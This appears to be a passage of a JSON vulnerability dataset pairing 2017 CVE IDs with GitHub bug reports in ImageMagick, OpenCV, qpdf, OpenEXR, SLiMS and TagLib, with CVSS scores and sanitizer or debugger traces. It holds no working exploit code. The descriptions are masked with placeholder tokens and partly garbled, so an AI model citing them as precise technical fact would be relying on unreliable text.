        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12585",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/47",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/47",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2017-05-25T20:01:39Z",
        "description": "FILETAG So if my POST variable APITAG will trigger sql injection if not contains these chars. Example: ERRORTAG FILETAG And also CODETAG Variable APITAG does not sanitize for sql query yet. So it'll trigger injection like this FILETAG These NUMBERTAG urls have the same problems FILETAG FILETAG This bug is excutable by everyone who has librarian role (single).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12586",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/48",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/48",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2017-05-25T20:06:38Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12587",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/535",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/535",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-04T13:45:58Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code CODETAG magick[...] is from APITAG ERRORTAG magick[x] can be large as NUMBERTAG ff: ERRORTAG So 'filesize' can be large as NUMBERTAG UL NUMBERTAG w, the loop in the above will be large. On the other handle, APITAG in the loop has no success_status checking, so a crafted file will cause a larget of failed I/O in the loop. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12595",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/146",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/146",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-08-22T11:31:11Z",
        "description": "QPDF NUMBERTAG Stack Corruption. APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG WARNING: APITAG file is damaged WARNING: APITAG can't find startxref WARNING: APITAG Attempting to reconstruct cross reference table Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) () from PATHTAG (gdb) exploitable Description: Possible stack corruption Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. Other tags: APITAG NUMBERTAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12596",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/238",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/238",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2017-07-29T06:35:23Z",
        "description": "heap based buffer overflow in exrmaketiled . A heap based buffer overflow occurs when we test exrmaketiled with the latest code of this repo. The details of the bug as follows: $ ./exrmaketiled PATHTAG /tmp/out APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c7fe at pc NUMBERTAG fc NUMBERTAG e NUMBERTAG a5ab bp NUMBERTAG ffe NUMBERTAG e7e0 sp NUMBERTAG ffe NUMBERTAG e7d8 READ of size NUMBERTAG at NUMBERTAG c7fe thread T NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG const , int, unsigned short , int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG ca7 in APITAG const , int, APITAG >, char const &) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG in APITAG const , int, int, char const &) PATHTAG NUMBERTAG fc NUMBERTAG ea NUMBERTAG bb7 in execute PATHTAG NUMBERTAG fc NUMBERTAG d NUMBERTAG ea in APITAG ) PATHTAG NUMBERTAG fc NUMBERTAG ea7c NUMBERTAG in APITAG int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ed in APITAG const , char const , int, APITAG APITAG APITAG int, int, std::set<std::string, std::less APITAG , std::allocator APITAG > const&, Extrapolation, Extrapolation, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fc NUMBERTAG dd NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG c7fe is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc NUMBERTAG f NUMBERTAG a NUMBERTAG f in operator APITAG long) ( PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG adf0 in APITAG const&, unsigned long, unsigned long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG ffff8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING And you could get the testcase and more details: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12597",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9309",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9309",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-04T09:29:14Z",
        "description": "Some bugs result to crashes when in imread of opencv (include heap overflow and out of bound write). APITAG Some crashes are found in opencv when a malformed image file read by calling \"cv::imread\" function. Openc NUMBERTAG and the latest commit are tested, but it seems that the bugs also impacts Openc NUMBERTAG The bugs which result to \"segment fault\" are including heap overflow and out of bound write, which may be potential security threat. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description Some details are as follows: APITAG details and testcases refer to : FILETAG ================== An out of bound write error occurs when reads it by using cv::imread. ERRORTAG NUMBERTAG A heap based buf overflow results to invalid write ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: testcases URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12600",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9311",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9311",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-04T10:12:30Z",
        "description": "Two DOS bugs of opencv. APITAG Two DOS bugs are reported, one exhausts cpu for a long time and the other exhausts memory at mean while. System information (version) APITAG NUMBERTAG Operating System / Platform => Linu NUMBERTAG Bit Compiler => Gcc > APITAG NUMBERTAG Operating System / Platform => Linux Compiler => Gcc Detailed description Please see the bug NUMBERTAG and bug NUMBERTAG for the details in the following url: FILETAG and testcases in testcases URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12640",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/542",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/542",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-05T02:32:19Z",
        "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG So a crafted file will cause x_off[i] out of bound operation vulnerability. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12641",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/550",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/550",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-08T13:35:29Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12642",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/552",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/552",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-09T01:39:20Z",
        "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12643",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/549",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/549",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-08T09:08:24Z",
        "description": "memory exhaustion in APITAG in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify JNG file that contains chunk data, imagemagick will allocate memory to store the chunk data in function APITAG Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG So the only limitation is it must smaller than PNG_UINT NUMBERTAG MAX, it is still very large. Also when chunk type is JDAT, it will write chunk data to file as follow: ERRORTAG So a crafted jng file can cause memory exhausted and large I/O. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12644",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/551",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/551",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-09T01:35:51Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12654",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/620",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/620",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:13:37Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12662",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/576",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/576",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T01:34:17Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12663",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/573",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/573",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T01:21:03Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12664",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/574",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/574",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T01:25:28Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12665",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/577",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/577",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T01:38:06Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12666",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/572",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/572",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T00:39:44Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12667",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/553",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/553",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-09T01:50:39Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12668",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/575",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/575",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T01:29:33Z",
        "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12669",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/571",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/571",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T00:25:46Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12670",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/610",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/610",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-24T12:28:48Z",
        "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12671",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/621",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/621",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:36:32Z",
        "description": "bad free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A bad free vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12672",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/617",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/617",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:05:14Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12673",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/619",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/619",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:12:37Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12674",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/604",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/604",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T15:22:16Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When convert PDB file , imagemagick will read data from input file and deal with it, here is the critical code: pdb.c , in function APITAG CODETAG A crafted file will cause this while loop endless. testcase: FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12675",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/616",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/616",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:03:39Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12676",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/618",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/618",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-25T11:06:12Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12678",
        "Issue_Url_old": "https://github.com/taglib/taglib/issues/829",
        "Issue_Url_new": "https://github.com/taglib/taglib/issues/829",
        "Repo_new": "taglib/taglib",
        "Issue_Created_At": "2017-07-18T02:28:33Z",
        "description": "A pointer to cast vulnerbility is discovered in the project. Overview\uff1a I discovered a vulnerability of pointer cast in APITAG vulnerability exist in the code of reading the tag of a mp3 video of ID NUMBERTAG APITAG casting a pointer of a List in a tag to APITAG ,the address of the APITAG in the tag becomes an invalid value. Report and POC\uff1a The detail analysis report and APITAG files can be found in the attachment. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: APITAG @ VARAS of IIE APITAG Liu @ VARAS of IIE email: EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12691",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/656",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/656",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-07T01:40:35Z",
        "description": "memory exhaustion in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): jng jpeg png xml zlib PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG c NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG ffff NUMBERTAG heap NUMBERTAG ffff NUMBERTAG b1a NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a NUMBERTAG f NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a1f7d NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a2d NUMBERTAG stack NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ad NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6e NUMBERTAG b5c6e NUMBERTAG b5c6f NUMBERTAG PATHTAG NUMBERTAG b5c6f NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6e4d NUMBERTAG PATHTAG NUMBERTAG b6e4d NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffc NUMBERTAG b6ffc NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG 